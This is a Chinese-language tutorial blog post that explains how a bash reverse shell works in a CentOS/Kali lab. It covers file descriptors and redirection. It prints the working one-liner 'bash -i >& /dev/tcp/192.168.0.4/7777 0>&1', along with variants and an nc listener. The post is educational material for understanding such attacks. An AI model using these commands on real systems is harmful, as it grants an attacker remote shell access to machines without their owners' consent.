Linux下几种反弹Shell方法的总结与理解(利用bash脚本)

之前在网上看到很多师傅们总结的linux反弹shell的一些方法,为了更熟练的去运用这些技术,于是自己花精力查了很多资料去理解这些命令的含义,将研究的成果记录在这里,所谓的反弹shell,指的是我们在自己的机器上开启监听,然后在被攻击者的机器上发送连接请求去连接我们的机器,将被攻击者的shell反弹到我们的机器上,下面来介绍分析几种常用的方法。

实验环境:
CentOS 6.5:192.168.0.3

kali2.0:192.168.0.4
方法1:
反弹shell命令如下:

bash -i >& /dev/tcp/ip/port 0>&1

首先,使用nc在kali上监听端口:

nc -lvp 7777

Linux下几种反弹Shell方法的总结与理解(利用bash脚本)_第1张图片然后在CentOS6.5下输入:

bash -i >& /dev/tcp/192.168.0.4/7777 0>&1

Linux下几种反弹Shell方法的总结与理解(利用bash脚本)_第2张图片
可以看到shell成功反弹到了kali上面,可以执行命令:
Linux下几种反弹Shell方法的总结与理解(利用bash脚本)_第3张图片
在解释这条反弹shell的命令原理之前,首先需要掌握几个点。

linux文件描述符:linux shell下有三种标准的文件描述符,分别如下:

0 - stdin 代表标准输入,使用<或<<
1 - stdout 代表标准输出,使用>或>>
2 - stderr 代表标准错误输出,使用2>或2>>

还有就是>&这个符号的含义,最好的理解是这样的:

当>&后面接文件时,表示将标准输出和标准错误输出重定向至文件。
当>&后面接文件描述符时,表示将前面的文件描述符重定向至后面的文件描述符

也有师傅把&这个符号解释为是取地址符号,学过C语言的小伙伴们都知道&这个符号代表取地址符,在C++中&符号还代表为引用,这样做是为了区分文件描述符和文件,比如查看一个不存在的文件,要把标准错误重定向到标准输出,如果直接cat notexistfile 2>1的话,则会将1看作是一个文件,将标准错误输出输出到1这个文件里而不是标准输出,而&的作用就是为了区分文件和文件描述符:
Linux下几种反弹Shell方法的总结与理解(利用bash脚本)_第4张图片

理解了上面这些知识,下面来解释一下这一条反弹shell的命令首先,bash -i代表在本地打开一个bash,然后就是/dev/tcp/ip/port, /dev/tcp/是Linux中的一个特殊设备,打开这个文件就相当于发出了一个socket调用,建立一个socket连接,>&后面跟上/dev/tcp/ip/port这个文件代表将标准输出和标准错误输出重定向到这个文件,也就是传递到远程上,如果远程开启了对应的端口去监听,就会接收到这个bash的标准输出和标准错误输出,这个时候我们在本机CentOS输入命令,输出以及错误输出的内容就会被传递显示到远程。
Linux下几种反弹Shell方法的总结与理解(利用bash脚本)_第5张图片
在本地输入设备(键盘)输入命令,在本地看不到输入的内容,但是键盘输入的命令已经被输出到了远程,然后命令的执行结果或者错误也会被传到远程,查看远程,可以看到标准输出和标准错误输出都重定向到了远程:
Linux下几种反弹Shell方法的总结与理解(利用bash脚本)_第6张图片那么,0>&2也是可以的,代表将标准输入重定向到标准错误输出,而标准错误输出重定向到了/dev/tcp/ip/port这个文件,也就是远程,那么标准输入也就重定向到了远程
Linux下几种反弹Shell方法的总结与理解(利用bash脚本)_第7张图片
Linux下几种反弹Shell方法的总结与理解(利用bash脚本)_第8张图片区别:

bash -i >& /dev/tcp/ip/port

只是把输出输送到远程终端

bash -i >& /dev/tcp/ip/port 0>&1或者bash -i >& /dev/tcp/ip/port 0>&2

后面多了0>&1和0>&2,表示将输入也送入终端。即想在centos虚拟机的输入,要在kali中输入,显示结果也在kali中显示。但是第一种的输入是在centos中输入。

你可能感兴趣的:(Linux基础)